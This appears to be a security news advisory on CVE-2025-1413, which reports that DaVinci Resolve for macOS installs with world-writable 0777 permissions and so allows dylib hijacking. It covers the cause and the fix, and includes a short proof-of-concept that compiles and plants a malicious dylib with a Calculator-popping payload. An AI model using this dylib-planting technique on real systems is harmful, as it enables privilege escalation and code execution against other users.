CVE CyberSecurity Database News

CVE-2025-1413 - DaVinci Resolve for MacOS Vulnerable to Dylib Hijacking via 777 File Permissions

Poster -

---

Summary:
A critical security flaw (CVE-2025-1413) has been discovered in DaVinci Resolve for macOS, where the application’s directory and files are installed with unsafe permissions (rwxrwxrwx or 0777). This misconfiguration opens the door to *Dylib hijacking*, potentially allowing guest and non-privileged users or rogue applications to escalate privileges or execute malicious code. This vulnerability affects DaVinci Resolve on macOS versions before 19.1.3.

What Is the Issue?

When you install DaVinci Resolve (before version 19.1.3) on a Mac, the installer creates the application folder and its contents with world-writable permissions. In technical terms, that means:

$ ls -ld /Applications/DaVinci\ Resolve
drwxrwxrwx  10 root  wheel  320 Mar 21 10:53 /Applications/DaVinci Resolve

This outputs drwxrwxrwx, which translates to 0777 (everyone can read, write, execute).

According to Apple’s security guidelines, applications should be drwxr-xr-x (or 0755), so only the owner (usually root) can modify the files, but anyone can read and execute them.

Understanding Permissions

- rwxrwxrwx (0777): Anyone (even "Guest" accounts or malicious apps) can overwrite or replace files in the DaVinci Resolve folder.
- drwxr-xr-x (0755): Only the owner (root/admin) can make changes; others can only read or execute.

Dylib Hijacking Explained

DaVinci Resolve, like many macOS apps, loads dynamic libraries (.dylib files) at runtime. If an attacker can place or replace a .dylib in the Resolve directory due to 0777 permissions, they can inject malicious code to run with the privileges of the user launching Resolve.

Multi-user Macs: Any user (even Guest) can tamper with Resolve's files for all users.

- Shared Workstations: A non-admin could provide a rogue Dylib, impacting admins or other higher-privileged users.

Step-by-Step Exploit Example

Below is a simplified walk-through for security research only!

1. Confirm DaVinci Resolve Permissions

ls -ld /Applications/DaVinci\ Resolve
# Output should show drwxrwxrwx if vulnerable

2. Identify a Dylib Used by Resolve

Suppose libFakeEffect.dylib is loaded by Resolve on launch.

As any user (even ‘guest’)

echo 'int _init() { system("open /System/Applications/Calculator.app"); return ; }' > evil.c
clang -dynamiclib -o /Applications/DaVinci\ Resolve/libFakeEffect.dylib evil.c

This basic payload pops Calculator when Resolve runs.

Mitigation and Fix

Blackmagic Design fixed this in DaVinci Resolve version 19.1.3.
Current and future installers ensure proper permissions (0755) on app folders and files.

To fix manually (if not updating right away)

sudo chmod -R 755 /Applications/DaVinci\ Resolve

Update immediately!
Download latest Resolve: https://www.blackmagicdesign.com/support/family/davinci-resolve-and-fusion

References

- CVE-2025-1413 on MITRE *(Coming soon)*
- macOS Application Security Guidelines
- What is Dylib Hijacking? — Malwarebytes
- DaVinci Resolve Official Website
- Analysis of Dylib Hijacking in macOS


Bottom line: If you use DaVinci Resolve on Mac and haven’t updated to 19.1.3 or later, do it _now_ to block this open door to attackers. Check and repair permissions if needed — and stay safe!

Timeline

Published on: 02/28/2025 09:15:11 UTC
Last modified on: 03/26/2025 16:15:20 UTC